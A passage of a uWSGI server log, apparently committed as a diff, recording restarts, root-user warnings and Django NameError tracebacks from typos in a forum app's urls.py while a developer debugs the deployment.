seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +ModuleNotFoundError: No module named 'master' +unable to load app 0 (mountpoint='') (callable not found or import error) +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x1dd89c0 pid: 16373 (default app) +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 16373) +spawned uWSGI worker 1 (pid: 16374, cores: 2) +spawned uWSGI http 1 (pid: 16375) +[pid: 16374|app: 0|req: 1/1] 117.100.100.38 () {42 vars in 1374 bytes} [Fri Jan 8 13:25:57 2021] GET /login/ => generated 6416 bytes in 37 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 16374|app: -1|req: -1/2] 117.100.100.38 () {38 vars in 1224 bytes} [Fri Jan 8 13:25:57 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 16374|app: 0|req: 2/3] 117.100.100.38 () {48 vars in 1438 bytes} [Fri Jan 8 13:26:05 2021] POST /login/ => generated 82 bytes in 7 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1) +[pid: 16374|app: 0|req: 3/4] 117.100.100.38 () {48 vars in 1438 bytes} [Fri Jan 8 13:26:10 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 16374|app: 0|req: 4/5] 117.100.100.38 () {40 vars in 1382 bytes} [Fri Jan 8 13:26:10 2021] GET /home/ => generated 8157 bytes in 10 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 16374|app: 0|req: 5/6] 117.100.100.38 () {40 vars in 1385 bytes} [Fri Jan 8 13:26:16 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 16374|app: 0|req: 6/7] 117.100.100.38 () {40 vars in 1387 bytes} [Fri Jan 8 13:26:16 2021] GET /publish/ => generated 4909 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 16374|app: 0|req: 7/8] 117.100.100.38 () {40 vars in 1381 bytes} [Fri Jan 8 13:26:23 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 16374|app: 0|req: 8/9] 117.100.100.38 () {48 vars in 1480 bytes} [Fri Jan 8 13:26:26 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 16374|app: 0|req: 9/10] 117.100.100.38 () {40 vars in 1380 bytes} [Fri Jan 8 13:26:26 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 16374|app: 0|req: 10/11] 117.100.100.38 () {42 vars in 1412 bytes} [Fri Jan 8 13:26:30 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 16374|app: 0|req: 11/12] 117.100.100.38 () {42 vars in 1412 bytes} [Fri Jan 8 13:26:30 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 16374|app: 0|req: 12/13] 117.100.100.38 () {42 vars in 1412 bytes} [Fri Jan 8 13:26:30 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 16374|app: 0|req: 13/14] 117.100.100.38 () {42 vars in 1412 bytes} [Fri Jan 8 13:26:30 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 16374|app: 0|req: 14/15] 117.100.100.38 () {42 vars in 1412 bytes} [Fri Jan 8 13:26:31 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 16374|app: 0|req: 15/16] 117.100.100.38 () {38 vars in 1333 bytes} [Fri Jan 8 13:26:35 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 16374|app: 0|req: 16/17] 117.100.100.38 () {40 vars in 1386 bytes} [Fri Jan 8 13:26:38 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 16374|app: 0|req: 17/18] 117.100.100.38 () {40 vars in 1386 bytes} [Fri Jan 8 13:26:41 2021] GET /publish/ => generated 4909 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 16374|app: 0|req: 18/19] 117.100.100.38 () {42 vars in 1413 bytes} [Fri Jan 8 13:27:30 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 16374|app: 0|req: 19/20] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:27:32 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 16374|app: 0|req: 20/21] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:27:33 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 16374|app: 0|req: 21/22] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:27:33 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 16374|app: 0|req: 22/23] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:27:33 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +Not Found: / +[pid: 16374|app: 0|req: 23/24] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 13:29:05 2021] GET / => generated 3244 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Fri Jan 8 13:30:18 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +Fri Jan 8 13:30:18 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:30:19 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-13-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: / +detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 7269 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8080 fd 4 +uwsgi socket 0 bound to TCP address 127.0.0.1:44363 (port auto-assigned) fd 3 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)] +Python main interpreter initialized at 0x11c79c0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +ModuleNotFoundError: No module named 'master' +unable to load app 0 (mountpoint='') (callable not found or import error) +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x11c79c0 pid: 17162 (default app) +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 17162) +spawned uWSGI worker 1 (pid: 17163, cores: 2) +spawned uWSGI http 1 (pid: 17164) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + re_path(r'^$',views.home) +NameError: name 're_path' is not defined +[pid: 17163|app: 0|req: 1/1] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 13:30:26 2021] GET / => generated 111698 bytes in 78 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + re_path(r'^$',views.home) +NameError: name 're_path' is not defined +[pid: 17163|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:30:29 2021] GET / => generated 111835 bytes in 39 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + re_path(r'^$',views.home) +NameError: name 're_path' is not defined +[pid: 17163|app: 0|req: 3/3] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:30:30 2021] GET / => generated 111835 bytes in 38 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Fri Jan 8 13:30:55 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +Fri Jan 8 13:30:55 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:30:56 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-13-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: / +detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 7269 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8080 fd 4 +uwsgi socket 0 bound to TCP address 127.0.0.1:42802 (port auto-assigned) fd 3 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)] +Python main interpreter initialized at 0x277e9c0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +ModuleNotFoundError: No module named 'master' +unable to load app 0 (mountpoint='') (callable not found or import error) +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x277e9c0 pid: 17337 (default app) +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 17337) +spawned uWSGI worker 1 (pid: 17338, cores: 2) +spawned uWSGI http 1 (pid: 17340) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + ulr(r'^$',views.home), +NameError: name 'ulr' is not defined +[pid: 17338|app: 0|req: 1/1] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:00 2021] GET / => generated 111812 bytes in 79 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + ulr(r'^$',views.home), +NameError: name 'ulr' is not defined +[pid: 17338|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:02 2021] GET / => generated 111812 bytes in 39 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + ulr(r'^$',views.home), +NameError: name 'ulr' is not defined +[pid: 17338|app: 0|req: 3/3] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:03 2021] GET / => generated 111812 bytes in 38 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + ulr(r'^$',views.home), +NameError: name 'ulr' is not defined +[pid: 17338|app: 0|req: 4/4] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:04 2021] GET / => generated 111812 bytes in 37 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + ulr(r'^$',views.home), +NameError: name 'ulr' is not defined +[pid: 17338|app: 0|req: 5/5] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:05 2021] GET / => generated 111812 bytes in 38 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response + callback, callback_args, callback_kwargs = self.resolve_request(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request + resolver_match = resolver.resolve(request.path_info) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve + for pattern in self.url_patterns: + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns + patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__ + res = instance.__dict__[self.name] = self.func(instance) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module + return import_module(self.urlconf_name) + File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module + return _bootstrap._gcd_import(name[level:], package, level) + File "", line 1006, in _gcd_import + File "", line 983, in _find_and_load + File "", line 967, in _find_and_load_unlocked + File "", line 677, in _load_unlocked + File "", line 728, in exec_module + File "", line 219, in _call_with_frames_removed + File "./ForumSystem/urls.py", line 35, in + ulr(r'^$',views.home), +NameError: name 'ulr' is not defined +[pid: 17338|app: 0|req: 6/6] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:05 2021] GET / => generated 111812 bytes in 37 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Fri Jan 8 13:32:51 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +Fri Jan 8 13:32:51 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:32:53 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-13-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: / +detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 7269 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8080 fd 4 +uwsgi socket 0 bound to TCP address 127.0.0.1:33873 (port auto-assigned) fd 3 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)] +Python main interpreter initialized at 0x21909c0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +ModuleNotFoundError: No module named 'master' +unable to load app 0 (mountpoint='') (callable not found or import error) +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x21909c0 pid: 17684 (default app) +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid 